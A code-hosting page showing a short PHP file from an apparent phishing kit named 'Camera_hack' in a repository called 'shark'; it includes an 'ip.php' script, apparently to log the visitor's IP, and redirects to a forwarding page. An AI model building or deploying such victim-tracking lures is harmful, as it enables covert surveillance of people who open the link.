Book a Demo!
Store
Features
Docs
Share
Support
News
About
Policies
Sign Up
Sign In
bhikandeshmukh
Edit Copy
Star
GitHub Repository:
bhikandeshmukh/shark
Path:
blob/master/phs/Camera_hack/template.php
9
9
6
views
1
<?php
2
include
'ip.php'
;
3
header
(
'Location: forwarding_link/index2.html'
)
;
4
exit
5
?>
6
7